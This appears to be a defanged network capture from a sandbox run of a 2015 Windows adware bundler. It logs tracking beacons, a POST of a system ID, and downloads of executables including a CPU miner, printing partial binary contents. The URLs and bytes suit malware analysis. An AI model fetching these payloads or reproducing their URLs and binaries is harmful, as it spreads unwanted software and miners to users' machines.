FnR9tVwNDE3Rm4rnBJdBaJpc09i7ShzMJeQ/XoMQJNAHm1mzJ3dgy9DawCIgLEHXiWY24jHO76uvlkGnx9J8rO618yxrSRrqOdyZCGHJviVRLa3llCHtIYnav/nW76CDuDZ99Cm6ZKUqazI w2pdU46GJa3KDXzCavBx239nuW7huTf2OdQS1NUcnlcIYx6tZPlVDesZJ5XsiHLj94r/m/irHYGadrVVH7D8w/FfG9S4pZp9slaSf jurUo261gSav34DXisBPLyKJuv0o/D81dvimS01xElAGWk9eUT6uBV2YAtEkO rJ lWx1mFFNZjvvaN9gJ4crwFhVEjHZaBzJruhN1YGlqKyH1GH zVE/8kuFhiLm2lfSgxrrsgP5sdYyIubXXZR n4STfbQ56POlGbe8vFcgI7tJhJbQaZLRs4lbk8lka8rw6uDVhtUEMldD4nBSsrsv3FuFvEcjsbhcqF23ANzP2g wQ7fMwrJJp1kcc2fGPiT K0dzr sfQC6Oc6WNIWMZdThDhVASoD lHz0xJPaX1ZQaKudDDAxA/8bhJNX8fx5yYX1yfw/cf2zNQXe1Jhbih3MDZfetND6Ck

<<< skipped >>>

GET /installer.gif?action=started&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=6189 HTTP/1.1

Accept: */*

Host: mystats.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: 3qzWs1YQAxm3PbDM seb8 haDV84wLHuBDXL1XYkebEaXx/RIyoxbI/FiuwlHSQZ

x-amz-request-id: 28E2E6E1A27C27A1

Date: Fri, 25 Sep 2015 22:45:26 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 3qzWs1YQAxm3PbDM seb8 haDV84wLHuBDXL1XYkebEaXx/RIyoxbI/FiuwlHSQZ..x-amz-request-id: 28E2E6E1A27C27A1..Date: Fri, 25 Sep 2015 22:45:26 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..

GET /crossbrowse/ie/107/ie.zip.005 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: zip.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 22:45:26 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441008913"

Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT

Cache-Control: max-age=40692

Content-Length: 8244985

Content-Type: text/plain; charset=UTF-8

X-HW: 1443221126.dop005.fr7.t,1443221126.cds036.fr7.c

[..Wa<.3.......Y.}S.Q)|.x.P..r._ip`...h.r...@..k.....8..o.D_C.0.h..M...gv......J..g.....a.4..~....A.Y.. .u:7..... i...$.....p...ORP.P... ....._.@......?.F.....8.@..l....{n...XGi......2..........FOqM..N_.}...S*he.I.q.. ..V...=.E....1....M.S.......f3%.?.....Ug.\.}...I..g..w..[....t..yR..DJ3.;.;W...._.....y.:..XZ<..40a.I..A...vUW..,...u"......>..*.....@D...YX.4.......v]...T.$..T.1...2.X..o.X....@.%...n.LL....-..A...n.......uq<.r$..t`M.:c9C..l./....}2.......{.O...7............;...M..x...rwqL.\.. ..b.........*f!..S|..*g...'dl..........eN..km...:.6.....s....n.5..0_r8 D.W...".S/%r.rU..c.......C.v5..C...3..z....\.B.-a..r......|..G..W.....2h..>jSy....Z.........tE...T....R.2...p..Q>...f.fj.#.Z.l....7..h.....>...-..K...<....?....B..........,.....$..~........^..V...Uq.672kCC......i....J....*...K.......0..14....{.Wwf".K.p....;.6.H."6y.q.E~. i.`...hN.....d../\A....hY.$!}3..7.*&.n......Z...Q>W.......`0.q..M..A@*.Y 0..7l"m......0...4..X2.|.C2j.[..K...gu...?.a..s.B.kX......j.t...B@|d.l._.zZ.. ."D(..PD..l?.%..w.....).v,v9m...w........G..C.SU.l7*JlW.....56.....v..{............G..3..0....R......Y.h,u..k.'.....$..&.[.9.. 8..1..DZF....n......l_.......*.R...Q$.3.q\..'...]...k..*..0....^#.|A.v...K...........T.Q.#...^e.c....V\..ysD.Ai^.ly..P.~..lreD.g_.Q.....i..kS.R...f..=9.9..q=D."......-N...C.....%.-..u.....<.qj..:..s......:>.I`.PJ..vQ.K.....o.)qew.K.G....w.....tJ.a4...L.[.......0.0#.),......7....J}*..^`w..Q.h...~e..Ql..*..|}...K.Z.*..'.....|..rp.@_.b..!..R.%....%..m"....W9..$ 1.......VZ..''.1,|..V...

<<< skipped >>>

POST /thankyou.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.downloadsoup.com

Content-Length: 469

Connection: Keep-Alive

Cache-Control: no-cache

cnt=346a2c6645c6ec5865e603ca985dd203&_srvlog=NSI &browser=un&capp=nsdummy&cid=11612&current_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=D6A6947B24975DB6AB9DE8B171C5FA6E&sysid1=D6A6947B24975DB6AB9DE8B171C5FA6E&te=1443221160&ts=1443221159&ver=1.1.2.41&c[OperaRUnew][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[OperaRUnew][pi]=0&c[OperaRUnew][e]=0&c[OperaRUnew][ts]=0&c[OperaRUnew][te]=0&cmdl=C:DOCUME~1admLOCALS~1Tempsx1C.tmp /ci 11612&bti1=

HTTP/1.1 200 OK

Content-Type: text/plain; charset=UTF-8

Date: Fri, 25 Sep 2015 22:45:59 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

Content-Length: 14

Connection: keep-alive

.... ..HTTP/1.1 200 OK..Content-Type: text/plain; charset=UTF-8..Date: Fri, 25 Sep 2015 22:45:59 GMT..Server: Apache/2.2.15 (Red Hat)..X-Powered-By: PHP/5.3.3..Content-Length: 14..Connection: keep-alive...... ....

GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_COUNT1 HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: ads.regiedepub.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 22:46:33 GMT

Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1

Content-Location: settags.cgi

Vary: negotiate

TCN: choice

Cache-Control: no-store, no-cache, must-revalidate

X-C4PC-ServerName: ads.regiedepub.com

P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"

Expires: Fri, 25 Sep 15 22:46:00 GMT

Set-Cookie: _c4aid=02C3E07DDD974541923F9A204A02BCBB; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;

Set-Cookie: _c4aid2=02C3E07DDD974541923F9A204A02BCBB,1443221193.0778; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;

Connection: close

Transfer-Encoding: chunked

Content-Type: text/javascript

41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..

GET /download/dwn/prq4633/este/re/setup_gmsd_re.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: dl.taxideataxus.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 22:46:18 GMT

Server: Apache/2.2.16

Last-Modified: Fri, 25 Sep 2015 15:36:08 GMT

ETag: "6a201e5-586f10-520941b404a00"

Accept-Ranges: bytes

Content-Length: 5795600

Keep-Alive: timeout=15, max=200

Connection: Keep-Alive

Content-Type: application/x-msdos-program

MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................0........X..........@..............................P.......(........... cX.............................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...(...........................@..P.............@......................@..P..................................................................................................................................................................string................<.@.....m.@..........)@..(@..(@..)@.....$)@..Free..0)@..InitInstance..L)@..CleanupInstance..h(@..ClassType..l(@..ClassName...(@..ClassNameIs...(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..InheritsFrom...)@..Dispatch...)@..MethodAddress..<*@..MethodName..x*@..FieldAddress...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObject.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.

<<< skipped >>>

GET /crossbrowse/ie/107/ie.zip.003 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: zip.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 22:45:25 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441008913"

Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT

Cache-Control: max-age=40706

Content-Length: 8244985

Content-Type: text/plain; charset=UTF-8

X-HW: 1443221126.dop005.fr7.t,1443221125.cds002.fr7.c

l...%...J.....=.6...<.,........#....U.s.I.* m..e_O.'.x..4.SV..x...q...d.[.R...A_.....&........."b.....g.........^...N}...$............^..O.&.S....y.Q..vm.!.W........j.kt.......D....%G......*..$.k...@c".e...wu..b.3..oV.....G..ER...o.V..co....v.P..[}.....m.......3.;.E..r.O...{."..'V.-....V.L.4....RF. .:`....M.8..z....z.m....7>...<t?.)$g.'.....~..i.i..W..gV...vZV......dy.cec<F2.8..ZT.W...}d.m..m5..h^...../.@.c.F.....vW......<.PQ....I.8...L-...C...........<%....n..b.4.3gJ.h.D.U...8....PV80..R.so~..k..S QGp4.%.i..I..?...Z@%.B..U!1..m.3.........|7h..s.;V,WBbPQ}=.......%..o......hc........5.9...v|.t...<"....t.Z6.........f.4.3.H..Y ...d...C-.u...B.....RIK:.*$$JP.........q..v.-........$....q..@.../-.. 6Ie.....7....0b...NR.Ti.<U.@a.$.8.m`.i... ~.Y.)j0....%....M.... .CF?0......pd.........M......~m.8.#3b .>...3|`./|W.=../#7j\U..k..@7..G.1.K..?=J../ ?....M...U.`...P.2....A&'?.:oI...\.}6...=k..D..Jv..<HfG..).>p..?.R1....GUo._.mb.M" X...6........#...V$...........GX[R...=.xX.C ~N.2..!gs.(.o...qa.......y0..G......p$0. ^.`.@.*..)?....u.&...L......6....................Q$....4AJFn....kj...................q...Q.K;.E.}..\9eL..jO4.....N..Y.........}GD{.j.....d.c.(...uMK$.h.T........~0..T.<a......PPC..x..&.%`}."5...Q%.4RS..F>@T.}...;..w...zOoL....^DX.<..'.M.Nl\..E{(.}....5.s.(....a.[...,....@.xD.:$.D?.h...:T.=r./.VD.V......k.J..9.dC..g.>_.9.........(RiV......]...}....u7.J..:c.,...D....O..-..A.x.... PP..j;...b...TA..(.,]... r..........t.....5.7`H.)<6A...9.....tD...bl.]e....F....{ .....5..

<<< skipped >>>

GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_FIN HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: ads.regiedepub.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 22:46:32 GMT

Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1

Content-Location: settags.cgi

Vary: negotiate

TCN: choice

Cache-Control: no-store, no-cache, must-revalidate

X-C4PC-ServerName: ads.regiedepub.com

P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"

Expires: Fri, 25 Sep 15 22:46:00 GMT

Set-Cookie: _c4aid=B171EA1CF77849208BC80261E6F3609C; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;

Set-Cookie: _c4aid2=B171EA1CF77849208BC80261E6F3609C,1443221192.82824; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;

Connection: close

Transfer-Encoding: chunked

Content-Type: text/javascript

41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..

GET /?domain=afsbdfgds.net&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=362&setup_id=800 HTTP/1.1

Host: VVV.djapp.info

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 25 Sep 2015 22:49:07 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Location: hXXp://d22nes4susdva1.cloudfront.net/finalinstaller/24.08.2015/FinalInstaller_dotnet4.exe

0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Fri, 25 Sep 2015 22:49:07 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..Location: hXXp://d22nes4susdva1.cloudfront.net/finalinstaller/24.08.2015/FinalInstaller_dotnet4.exe..0..

GET /data.gif?app=12345&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=9823 HTTP/1.1

Accept: */*

Host: logs.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 22:45:24 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1389114507"

Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

Cache-Control: max-age=86400

Content-Length: 35

Content-Type: image/gif

X-HW: 1443221125.dop009.fr7.t,1443221124.cds054.fr7.c

GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Fri, 25 Sep 2015 22:45:24 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1443221125.dop009.fr7.t,1443221124.cds054.fr7.c..GIF89a.............,...........D..;..

GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_F11 HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: ads.regiedepub.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 22:46:32 GMT

Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1

Content-Location: settags.cgi

Vary: negotiate

TCN: choice

Cache-Control: no-store, no-cache, must-revalidate

X-C4PC-ServerName: ads.regiedepub.com

P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"

Expires: Fri, 25 Sep 15 22:46:00 GMT

Set-Cookie: _c4aid=F478925BDE4F41C79B195A6D4C6D4251; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;

Set-Cookie: _c4aid2=F478925BDE4F41C79B195A6D4C6D4251,1443221192.55363; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;

Connection: close

Transfer-Encoding: chunked

Content-Type: text/javascript

41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..

GET / HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: ipgeoapi.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 22:45:24 GMT

Connection: keep-alive

Content-Type: application/json;charset=utf-8

Content-Length: 40

Server: thin 1.4.1 codename Chromeo

Via: 1.1 vegur

{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Fri, 25 Sep 2015 22:45:24 GMT..Connection: keep-alive..Content-Type: application/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codename Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..

GET /cmmdWriter.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: d2fpsq9kg43yka.cloudfront.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: application/x-msdownload

Content-Length: 48674

Connection: keep-alive

Date: Fri, 25 Sep 2015 21:06:28 GMT

Last-Modified: Fri, 25 Sep 2015 21:00:41 GMT

ETag: "67eda82fc3df3349df44916f6efe55bf"

Accept-Ranges: bytes

Server: AmazonS3

Age: 5913

X-Cache: Hit from cloudfront

Via: 1.1 bd5652a800046ffa43683320c0e731b4.cloudfront.net (CloudFront)

X-Amz-Cf-Id: lVe1RAX7En0exaLRnFCbt2haXzmhex7aTh3j-d_Zez-YUHKanNryuQ==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z...........0.......p....@..........................................................................s.......................................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata...`...@...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[...U.

<<< skipped >>>

GET /CPUminer/v6/Bundle_CPUminer.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.software-forus.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 22:46:07 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441897175"

Last-Modified: Thu, 10 Sep 2015 14:59:35 GMT

Cache-Control: max-age=28023

Content-Length: 104395

Content-Type: application/octet-stream

X-HW: 1443221168.dop008.fr7.t,1443221167.cds004.fr7.c

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...^..K.................b...........6............@.....................................................................................8............................................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data................x..............@....ndata... ...p...........................rsrc...8...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....cB..H.P.u..u..u...T.@..B...SV.5.cB..E.WP.u...X.@..e...E..E.P.u...\.@..}..e....D.@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h.[B.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$..(cB...Si.....VW.T.....tO.q.3.;5,cB.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5,cB.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /69/all/cp/row/setup.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: dl.staticclientstorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 22:45:21 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441951687"

Last-Modified: Fri, 11 Sep 2015 06:08:07 GMT

Cache-Control: max-age=3384

Content-Length: 1998408

Content-Type: application/x-msdownload

X-HW: 1443221122.dop003.fr7.t,1443221121.cds030.fr7.c

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..S............F.>.%...F.......F...Z.....e...............b.C...o.K.......r.......................:.......v.......?.....Rich............PE..L...&L.U............................./.......0....@..................................x....@................................. I...........A...........v..H............3..8...............................@............0...............................text...T........................... ..`.rdata..j*...0...,..................@..@.data....0...`.......F..............@....rsrc....A.......B...0..............@..@.reloc...............r..............@..B........................................................................................................................................................................................................................................................................................................................U...M.V3.;.tb.A.;.t[.p..q..q..q..P.;.t.....Q0..0....0.p..p..p .p8.p<.@......Hl.HP.HL....................3.^]........^]..........U...M.3.;.t..A.;.t.Q.P(.P,.P0.^...]........]....U...M.W..tt.y...tmSV.u...y.3..........C..0}......t....|....~.^[....._]....G4..t.9w$t.P.A(.I$P...M.....G4....Q._..w$.X...^[_]........_]..........U...E.S3.;........81.......}.8......V.u.;.u.^.C.[]....^.9^ u..F ` @..^(9^$u..F$. @..F(.N Wh....j.P.......;.u._^.....[]....U.R.~.V._4.........t..F(.N$WP......F....._^..[]........[].......

<<< skipped >>>

GET /36e0f22eacad857de2cd3b76aedc24a7.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: d16hr9n7t75k58.cloudfront.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: application/x-msdownload

Content-Length: 74893

Connection: keep-alive

Date: Fri, 25 Sep 2015 21:38:00 GMT

Last-Modified: Fri, 25 Sep 2015 21:31:39 GMT

ETag: "1f71f441cb13035d10d8b6979a628dda"

Accept-Ranges: bytes

Server: AmazonS3

Age: 4055

X-Cache: Hit from cloudfront

Via: 1.1 7ab285f149f01a2b05c04a9ee64a602f.cloudfront.net (CloudFront)

X-Amz-Cf-Id: TgrYDqhWJTlMIUXS8c_f99kD9zNetFl5j31Esoi9vMmZvh16ri29-w==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................p...............................................t.......`...............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...p...............................rsrc........`.......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /crossbrowse/ie/107/ie.zip.002 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: zip.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 22:45:25 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441008912"

Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT

Cache-Control: max-age=40706

Content-Length: 8244985

Content-Type: text/plain; charset=UTF-8

X-HW: 1443221126.dop011.fr7.t,1443221125.cds004.fr7.c

.R...rf..ol......}>....]..m..sr!..m..Mu..v....\..F.....R...[y8...6...7...h.K.52.'.m];."......;........6.Q.Li.T[...<.....P..SJGtW....~......&.{h.X.;<.x...........iX..........qda.....P....6X.....@.(........... .....!E..t......-O..n..z..N.....4s....=0...xa.o....Q..P....z..oNiC. ...{..B.~..B..o.4...UO[.T....Y..f..*..G......h.1...B.I..1...;..3....(...;..M..Q.5..,F.._..$#..K.(..&...Y...O.Q(.>O......UP.<?2_... .%.D..*.H..y...5..U7.#.....J 7.8b...f.r64h.g ....'y.m..M.fW...e..Y.SG..D...a.h..auwR......v......_.s<E.O......Y..n-..hT..p.$J.`>......-...9.2.Is..5...v.~%{b.H.d).......w..m5......X..v~..!.:.K..xEzE...J...V....It..C6...~V6%...uG..bW...........)}..m..|nh..............wB;.M>.E.h..E0..9.....F.ew....J.J......_*4....*{..V(z..}q........u.:tfT...G9'....6......8.....h..r...`s/..kw.H.~...E..r_!.A.U....kbn......2..m]T&&.....p.p,6_.....~........;V.......:.....MI.Vs..'.(..@...B...S...O...<....q.IG....wB$.......Q.&.....4...{^....g..L...e8...b..(n.B<..b5...o......"......!.G.....m^......2.:...^...1xd[..h.^...I...c~.h.....Q.3tv"^k....!.G...d........=:.....5`a....ab$.r'3..:...l..&.d@p...P"..7..w..@.F:.x...o..j..W...%...Cz?.Np......~....GFP ;..Z.......2.~8....R...s......//.7.....l.U>....r.....{0.Gs:......`.pm......_{.".........#d..")..o..-.... ...E.J.....}.XhH;h...4j. ..E..3]g..9.!..T...``r.hwhEbP......L..S/Is|5..`....}|W(...8E76..7...*.l....Wuw....2.....cO..)4c..=X9..zwT...i.`..Rh.......ST.zLL.9..V.}<..<....5.>\H..,...(.l....q>..i2<~.E.F.....b.......\.....j1W.Q...o\s..}.<....$^w.

<<< skipped >>>

GET /7121923af824073a25b2b7e6ba0a6e0e.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: d1mdi78qyff344.cloudfront.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: application/x-msdownload

Content-Length: 91074

Connection: keep-alive

Date: Thu, 24 Sep 2015 23:30:47 GMT

Last-Modified: Thu, 24 Sep 2015 22:26:40 GMT

ETag: "029aa26a0dd5ef7bd1ba1639703f8fae"

Accept-Ranges: bytes

Server: AmazonS3

Age: 83711

X-Cache: Hit from cloudfront

Via: 1.1 a034346227db119f7e0813186ca2d2c2.cloudfront.net (CloudFront)

X-Amz-Cf-Id: gQTiec42-3YzniXrS_fdTXZmADEMUnkx0f7a5o3wGnPURx7di0cqbQ==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@...........................)..............................................t........)..............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata....&..............................rsrc.........)......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /OperaRUnew/Bundle_OperaRUnew.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.software-forus.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 22:45:57 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1442816573"

Last-Modified: Mon, 21 Sep 2015 06:22:53 GMT

Cache-Control: max-age=28161

Content-Length: 104354

Content-Type: application/octet-stream

X-HW: 1443221158.dop001.fr7.t,1443221157.cds007.fr7.c

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...^..K.................b...........6............@.....................................................................................8............................................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data................x..............@....ndata... ...p...........................rsrc...8...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....cB..H.P.u..u..u...T.@..B...SV.5.cB..E.WP.u...X.@..e...E..E.P.u...\.@..}..e....D.@........FR..VV..U... 